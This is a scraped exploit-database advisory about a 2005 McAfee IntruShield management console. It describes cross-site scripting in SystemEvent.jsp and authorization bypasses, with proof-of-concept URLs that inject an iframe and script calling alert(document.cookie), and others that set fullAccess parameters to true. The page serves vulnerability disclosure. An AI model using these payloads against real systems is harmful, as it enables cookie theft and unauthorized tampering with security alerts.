Lucene search
C0ntexEDB-ID:25946HistoryJul 06, 2005 - 12:00 a.m.
McAfee IntruShield Security Management System - Multiple Vulnerabilities
2005-07-0600:00:00
c0ntex
www.exploit-db.com
12
7.4 High
AI Score
Confidence
Low
source: https://www.securityfocus.com/bid/14167/info
McAfee IntruShield Security Management System is susceptible to multiple vulnerabilities.
The first two issues are cross-site scripting vulnerabilities in the 'intruvert/jsp/systemHealth/SystemEvent.jsp' script. These issues are due to a failure of the application to properly sanitize user-supplied data prior to utilizing it in dynamically generated HTML.
The next two issues are authorization bypass vulnerabilities leading to information disclosure and the ability to acknowledge, de-acknowledge, and delete security alerts.
These vulnerabilities require a valid user account in the affected application.
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.example2.com/"%20width=800%20height=600></iframe>&severity=critical&count=1
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("trouble_ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1
Example URIs for the authentication bypass vulnerabilities:
https://www.example.com:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true
https://www.example.com/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%Demo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1 7.4 High
AI Score
Confidence
Low